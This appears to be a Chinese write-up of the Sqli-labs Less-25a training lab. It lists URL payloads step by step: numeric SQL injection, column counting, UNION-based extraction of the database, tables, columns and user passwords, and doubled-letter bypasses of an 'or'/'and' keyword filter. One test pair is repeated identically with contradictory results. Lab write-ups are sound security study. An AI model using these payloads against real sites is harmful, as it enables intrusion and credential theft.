Sqli-labs less-25a

判断注入类型，列数及注入点

构造

http://192.168.140.130/sq/Less-25a/?id=1
回显正常

http://192.168.140.130/sq/Less-25a/?id=1’
报错

构造

http://192.168.140.130/sq/Less-25a/?id=1 and 1=1
回显正常
http://192.168.140.130/sq/Less-25a/?id=1 and 1=1
报错

确定为数字型注入

http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 1
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 2
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 3
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 4
4的时候报错，确定列数为3

构造

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,2,3

确定注入点2，3

爆数据

数据库名

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select database()),3

表名

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3
注意informatrion中or字符的绕过

列名

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name=‘users’),3
注意or与and字符绕过

数据

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(username,‘~’,passwoorrd) from security.users),3
==注意password字符中or的绕过

*** OVER!***